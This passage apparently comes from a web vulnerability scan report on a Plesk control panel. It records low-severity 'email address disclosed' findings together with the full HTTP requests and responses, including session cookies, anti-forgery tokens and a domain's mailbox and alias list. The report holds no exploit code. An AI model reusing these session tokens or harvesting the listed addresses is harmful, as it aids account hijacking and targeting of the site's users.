Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'aliases-aliasesSection'
});
});
//]]>
</script>
</div>
<div id='tab-autoResponder' style="display: none;"><p>Set up an automatic response to any mail message coming to your e-mail address. Auto-reply is a standard means to notify your correspondents that you are out of office or on vacation.</p>

<div id='autoResponder-autoResponderSection' class='form-box' >
<div id='autoResponder-autoResponderSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="autoResponder[autoResponderSection][enabled]" value="0" /><input type="checkbox" name="autoResponder[autoResponderSection][enabled]" id="autoResponder-autoResponderSection-enabled" value="1" class="checkbox" />
<label for='autoResponder-autoResponderSection-enabled'>Switch on auto-reply&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div id='autoResponder-autoResponderSection-subject-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-subject'>Auto-reply message subject&nbsp;<span class="required">*</span></label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][subject]" id="autoResponder-autoResponderSection-subject" value="Re: &lt;request_subject&gt;" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div>
<div id='autoResponder-autoResponderSection-contentType-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-contentType'>Message format&nbsp;</label></div>
<div class='field-value'>
<div class='text-value'>
<label for="autoResponder-autoResponderSection-contentType-false"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-false" value="false" checked="checked" class="radio" />Plain text</label><br /><label for="autoResponder-autoResponderSection-contentType-true"><input type="radio" name="autoResponder[autoResponderSection][contentType]" id="autoResponder-autoResponderSection-contentType-true" value="true" class="radio" />HTML</label></div>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text format is supported by all mail client programs, therefore, all recipients will see the message in the same way as you see it. HTML messages look better because they let you enter formatted text with different font styles. However, some mail clients do not support HTML messages and some of recipients may not see the formatted text.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-message-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-message'>Auto-reply message text&nbsp;</label></div>
<div class='field-value'>

<textarea name="autoResponder[autoResponderSection][message]" id="autoResponder-autoResponderSection-message" cols="50" rows="6" class="f-large-size"></textarea>
<span class='field-errors' style="display:none;"></span>
<span class="hint">Plain text only, no HTML is allowed. All tags will be ignored.</span>
</div>
</div>
<div id='autoResponder-autoResponderSection-forwardAddress-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-forwardAddress'>Forward to&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][forwardAddress]" id="autoResponder-autoResponderSection-forwardAddress" value="" class="f-large-size input-text" />
<span class='field-errors' style="display:none;"></span>
<span class="hint">When the automatic response is sent, the original message will be forwarded to the specified e-mail address.</span>
</div>
</div>
<div id="attachments">

<div class="dynamicSubFormTemplate" style="display: none;">
<div id='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<input type="text" name="autoResponder[autoResponderSection][attachments][dynamicSubFormTemplate][file]" id="autoResponder-autoResponderSection-attachments-dynamicSubFormTemplate-file" value="" style="display: none;" class="input-text" />
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<div id='autoResponder-autoResponderSection-attachments-buttonAddAttachment-form-row' class='form-row' >
<div class='field-name'><label for='autoResponder-autoResponderSection-attachments-buttonAddAttachment'>Attach a file&nbsp;</label></div>
<div class='field-value'>

<a class="s-btn sb-item-add dynamicSubFormContentAddButton" id="autoResponder-autoResponderSection-attachments-buttonAddAttachment"></a>
<span class='field-errors' style="display:none;"></span>

</div>
</div></div>
<script type="text/javascript">
//<![CDATA[
Smb.ResponderAttachmentDynamicSubForm = Class.create(Smb.DynamicSubForm, {
_bindDynamicContent: function($super, content, isFirstElement) {
$super(content, false);
content.select('input').each(function(input) {
if (input.value) {
var element = new Element('div', {'class': 'text-value'});
input.up('.field-value').insert({top: element});
input.up('.field-value').select('input, .remove-responder-attachment-button-wrapper').each(function(item) {
if (item != element) {
element.insert(item);
}
});
   input.insert({after: input.value});
} else {
input.replace(new Element('input', {
type: 'file',
id: input.id,
name: input.name
}));
}
});
}
});

Jsw.onReady(function() {
new Smb.ResponderAttachmentDynamicSubForm({
applyTo: 'attachments',
addButtonId: 'autoResponder-autoResponderSection-attachments-buttonAddAttachment',
addButtonTitle: 'Add new attachment',
removeButtonId: 'remove-responder-attachment-button-wrapper',
removeButtonTitle: 'Remove' });
});
//]]>
</script></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'autoResponder-autoResponderSection'
});
});
//]]>
</script>
</div>
<div id='tab-antivirus' style="display: none;">
<tr>
<td colspan='2'>
<p class="" escape="">Antivirus service blocks e-mail messages that contain viruses and notifies both the sender and the recipient about it.</p></td>
</tr>

<div id='antivirus-antivirusSection' class='form-box' >
<div id='antivirus-antivirusSection-content-area'>
<div class='form-row'>
<div class='single-row'>

<input type="hidden" name="antivirus[antivirusSection][enabled]" value="0" /><input type="checkbox" name="antivirus[antivirusSection][enabled]" id="antivirus-antivirusSection-enabled" value="1" class="checkbox" />
<label for='antivirus-antivirusSection-enabled'>Switch on antivirus protection for this e-mail address&nbsp;</label>

<span style='display: none;' class='field-errors'></span>
</div>
</div>
<div class="form-row">

<div class="field-name">
<label for="antivirus-antivirusSection-antivirusSettings">
Check for viruses </label>
</div>

<div class="field-value">
<div class="text-value">

<div class="indent-box">
<input type="radio"
value="incoming"
id="antivirus-antivirusSection-antivirusSettings-incoming"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
checked="checked" />
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-incoming">
only incoming mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="outgoing"
id="antivirus-antivirusSection-antivirusSettings-outgoing"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-outgoing">
only outgoing mail </label>
</div>
</div>


<div class="indent-box">
<input type="radio"
value="both"
id="antivirus-antivirusSection-antivirusSettings-both"
class="radio"
name="antivirus[antivirusSection][antivirusSettings]"
/>
<div class="indent-box-content">
<label for="antivirus-antivirusSection-antivirusSettings-both">
incoming and outgoing mail </label>
</div>
</div>

</div>
</div>
</div></div>
</div>
<script type='text/javascript'>
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Panel({
title: '',
applyTo: 'antivirus-antivirusSection'
});
});
//]]>
</script>
</div>

<div class="btns-box">
<div class="box-area">
<div class="form-row">
<div class="field-name">
<span class="required">*</span>
Required fields </div>
<div class="field-value">

<span id='btn-send' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-send',
title: 'OK',
cls: 'btn',
name: 'send',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.submit(this); }
});
});
</script>

<span id='btn-cancel' class='btn'></span>
<script type='text/javascript'>
Jsw.onReady(function() {
new Jsw.CommandButton({
applyTo: 'btn-cancel',
title: 'Cancel',
cls: 'btn',
name: 'cancel',
value: '',
description: '',
disabled: false,
handler: function(event) { Jsw.redirect("/email-address/index"); }
});
});
</script>

<input type="hidden" name="hidden" value="" id="hidden" />
<!-- ability to submit form via Enter -->
<input type="image" src="/skins/default/img/blank.gif" style="border: 0; height: 0; width: 0; position: absolute;" />
</div>
</div>
</div>
</div>

<input type="hidden" name="forgery_protection_token" value="bdaafe67daaa200e2f077bd9577b09f4" id="form_forgery_protection_token" /></form>

<script type='text/javascript'>
Jsw.onReady(function() {
new Smb.Views.EmailFormAjax({
applyTo: 'form-emailaddress',
waitButtonTitle: 'Please wait'
});
});
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.4. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/list

Issue detail

The following email addresses were disclosed in the response:

Request

GET /smb/email-address/list HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.nosedivesailing.com:8880/smb/email-address/edit/id/4
Cookie: PLESKSESSID=d8ef408a62e3c0d46c9effc4a0828d66; locale=en-US

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:57:44 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:57:44 GMT
Connection: close
Content-Length: 21565

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="bdaafe67daaa200e2f077bd9577b09f4" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Mail - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Flist' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"active","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
</div>
<h2><span>Mail</span></h2>
</div>
</div>


<div class="msg-box msg-info"><div><div><div><div><div>
<div class="msg-content">
<span class="title">Information:</span> The settings of e-mail address format-2@nosedivesailing.com were saved. </div>
</div></div></div></div></div></div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.bar.Tabs({
cls: 'tabs',
renderTo: 'main',
items: [{"componentType":"Jsw.bar.Button","title":"E-mail Addresses","href":"\/email-address\/list","containerCls":"active"},{"componentType":"Jsw.bar.Button","title":"Mailing Lists","href":"\/mail-list\/list","containerCls":""}] });
});
//]]>
</script>
<script type="text/javascript">
//<![CDATA[

Jsw.namespace('Smb.Views.Emails');

Smb.Views.Emails = {

_configuationDialog: null,
selectedEmailId: null,

showConfiguration: function(emailId) {
this.selectedEmailId = emailId;

if (this._configuationDialog) {
this._configuationDialog.show();
return;
}

this._configuationDialog = new Jsw.Popup({
title: 'Configure E-mail Client',
titleCls: 'pp-configure-email-client',
content: '<p>' + 'If you use Microsoft Outlook, Outlook Express, Thunderbird, or Apple Mail, click the link below to open step-by-step instructions on how to set up your e-mail account in these clients. To configure other e-mail clients, use the account settings shown under the Manual Setup.' + '</p>' +
'<p><a href="' + Jsw.baseUrl + '/help/redirect/controller-name/email-address/action-name/configuration" target="_blank">' +
'View instructions on configuring MS Outlook, Outlook Express, Apple Mail, and Thunderbird.' +
'</a></p>' +
'<div class="form-box">' +
'<div class="box-area">' +
'<div class="title">' +
'<div class="title-area">' +
'<h3><span>' +
'Manual Setup' +
'</span></h3>' +
'</div>' +
'</div>' +
'<div class="content">' +
'<div class="content-area" id="mailSettingsContent">' +
'</div>' +
'</div>' +
'</div>' +
'</div>',
buttons: [{
title: 'Close',
handler: function(event, popup) {
popup.hide();
}
}],
onShow: function() {
var dialog = Smb.Views.Emails._configuationDialog;
new Ajax.Request(Jsw.prepareUrl('/email-address/configuration/id/' + Smb.Views.Emails.selectedEmailId), {
method: 'get',
onCreate: function() {
$('mailSettingsContent').update(
'<div class="ajax-loading">' +
'Loading...' +
'</div>'
);
},
onSuccess: function(transport) {
$('mailSettingsContent').update(transport.responseText);
},
on500: function(){
dialog.hide();
}
});
}
});
}

}

//]]>
</script>
<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Hint({
renderTo: 'main',
hint: 'Create and manage e-mail accounts associated with your domains. For each e-mail account, you can set up a mailbox, a number of additional e-mail addresses that will point to the same mailbox (e-mail aliases), an auto-reply, and mail forwarding to one or several e-mail addresses. You can also set up protection from spam and viruses, if these services are available for your account.' });

new Jsw.List({
id: 'email-addresses-list',
renderTo: 'main',
data: {"pager":{"pageCount":1,"itemCountPerPage":25,"first":1,"current":1,"last":1,"pagesInRange":{"1":1},"firstPageInRange":1,"lastPageInRange":1,"currentItemCount":6,"totalItemCount":6,"firstItemNumber":1,"lastItemNumber":6},"state":{"sortField":"name","sortDirection":"up","currentPage":1,"itemsPerPage":25,"searchFilters":{"name":{"searchText":""}},"forceShowSearch":false},"data":[{"id":"2","name":"fdf080d9224fd0d18957a62c","domainName":"vulnerable.host.fqdn","domainId":"1","userId":"4","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=fdf080d9224fd0d18957a62c@vulnerable.host.fqdn"},{"id":"5","name":"fdf080d9fb033e482a9703a6","domainName":"vulnerable.host.fqdn","domainId":"1","userId":null,"userContactName":null,"aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=fdf080d9fb033e482a9703a6@vulnerable.host.fqdn"},{"id":"1","name":"format-1","domainName":"vulnerable.host.fqdn","domainId":"1","userId":"3","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-1@nosedivesailing.com"},{"id":"3","name":"format-1fdf080d9644e588dffa16265","domainName":"nosedivesailing.com","domainId":"1","userId":"5","userContactName":"format-1","aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-1fdf080d9644e588dffa16265@nosedivesailing.com"},{"id":"4","name":"format-2","domainName":"vulnerable.host.fqdn","domainId":"1","userId":null,"userContactName":null,"aliases":["3458p93245vrt53@vulnerable.host.fqdn","dfgjhfgjuytuntru@vulnerable.host.fqdn","hgkhjlkppppp@nosedivesailing.com","hrsegjoj@nosedivesailing.com"],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-2@nosedivesailing.com"},{"id":"6","name":"format-2fdf080d97a35d24ced0544fc","domainName":"nosedivesailing.com","domainId":"1","userId":null,"userContactName":null,"aliases":[],"redirects":[],"autoresponderEnabled":false,"webmailUrl":"http:\/\/webmail.nosedivesailing.com:80\/imp\/login.php?imapuser=format-2fdf080d97a35d24ced0544fc@nosedivesailing.com"}],"locale":{"recordsTotal":"%%total%% items total","pages":"Pages","firstPage":"First","lastPage":"Last","numberOfItemPerPage":"Number of entries per page","hideSearch":"Hide Search","showSearch":"Show Search","buttonSearch":"Search","buttonResetSearch":"Reset Search","noEntriesFound":"No items found.","itemsNotSelected":"Select items first.","messageBoxButtonYes":"Yes","messageBoxButtonNo":"No","messageBoxButtonOk":"OK","allItems":"All"}},
dataUrl: '/email-address/list-data',
disabledSelectHint: '[[disabledSelectHint]]',
searchFilters: {"name":{"type":"text","fields":[],"options":null,"title":"E-mail address","overal":false}},
columns: [
Jsw.list.COLUMN_SELECTION,
{
header: 'E-mail address',
sortable: true,
dataIndex: 'name',
renderer: function(item) {
var aliases = '';
if (0 < item.aliases.length) {
aliases = ' <span class="minor">(' + item.aliases.join('; ') + ')</span>';
}
return '<a href="' + Jsw.baseUrl + '/email-address/edit/id/' + item.id + '">'
+ item.name.escapeHTML() + '@' + item.domainName.escapeHTML() + '</a>' + aliases;
}
}, {
header: '',
cls: 'minor',
renderer: function(item) {
var ret = [];
if (0 < item.redirects.length) {
var message = 1 == item.redirects.length
? '%%firstAddress%%' : '%%firstAddress%% (and %%countLeft%% more)';
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-redirect-on_16.gif" alt="*"> '
+ message
.replace('%%firstAddress%%', item.redirects[0].escapeHTML())
.replace('%%count%%', item.redirects.length)
.replace('%%countLeft%%', item.redirects.length - 1)
+ '</nobr></div>'
    );
}
if (item.autoresponderEnabled) {
ret.push(
'<div class="b-indent"><nobr>'
+ '<img class="b-indent-icon" src="' + Jsw.skinUrl + '/img/icons/small/mail-autoresponder-on_16.gif" alt="*"> '
+ 'Auto-reply is switched on.' + '</nobr></div>'
);
}
return ret.join('');
}
}, {
header: 'User',
sortable: true,
cls: 'minor',
dataIndex: 'userContactName',
renderer: function(item) {
return item.userId
? '<a href="' +
Jsw.baseUrl +
'/user/' + 'edit' +
'/id/' + item.userId +
'">' + item.userContactName.escapeHTML() + '</a>'
: '';
}
}, {
header: '',
cls: 'action-icon-set t-r',
renderer: function(item) {
var content =
'<span>' +
'<span class="tooltipData">' +
'Learn how to set up your e-mail account in a mail client program, such as Microsoft Outlook, Outlook Express, Thunderbird, and Apple Mail.' +
'</span>' +
'<a href="#" onclick="Smb.Views.Emails.showConfiguration(' + item.id + ');">' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/edit-email_16.gif"/>' +
'</a>' +
'</span> ';

if (item.webmailUrl) {
var onclick = Smb.Webmail.urlWrapper(item.webmailUrl) + 'return false;';
content +=
'<span>' +
'<span class="tooltipData">' +
'Open webmail for this e-mail address in a new browser window.' +
'</span>' +
'<a href="#" onclick=\'' + onclick + '\'>' +
'<img src="' + Jsw.skinUrl + '/img/icons/small/webmail-on_16.png"/>' +
'</a>' +
'</span> ';
} else {
   content += '<img src="' + Jsw.skinUrl + '/img/icons/small/spacer_16.gif"/> ';
}

return content;
}
}
],
operations: [
{
componentType: 'Jsw.SmallButton',
title: 'Create E-mail Address',
description: 'Create a new e-mail address in the system and assign it to a user. To create a business e-mail address not associated with any particular user (like sales@mycompany.com), go to the Mailing Lists tab, and create a mailing list.',
addCls: 'sb-add-mail-account',
href: '/email-address/create'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Change Settings',
description: 'Switch mail service for the domain on or off, specify how to deal with mail sent to nonexistent users, and select webmail program.',
addCls: 'sb-change-mail-settings',
href: '/email-address/mail-settings'
}, {
componentType: 'Jsw.bar.Separator'
}, {
componentType: 'Jsw.SmallButton',
title: 'Remove',
description: 'Remove selected e-mail addresses.',
addCls: 'sb-remove-selected',
handler: function() {
Jsw.getComponent('email-addresses-list').execGroupOperation({
url: '/email-address/delete/?redirect=/email-address/list/',
subtype: 'delete',
locale: {
confirmOnGroupOperation: 'Remove the selected e-mail addresses?' }
});
}
}
]
});
});
//]]>
</script>

</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

11.5. http://vulnerable.plesk.control.panel.20110407.20:8880/smb/email-address/list/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /smb/email-address/list/

Issue detail

The following email address was disclosed in the response:

Request

GET /smb/email-address/list/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=17161f28b87a6960fb097d11330c9c53; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:22:39 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:22:40 GMT
Connection: close
Content-Length: 19251

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="3e86204e9517123c7f585d736d64aa3f" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<title>Mail - Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/email-address/action-name/list" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Femail-address%2Flist%2F' + '&activeModule=' + 'mail' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
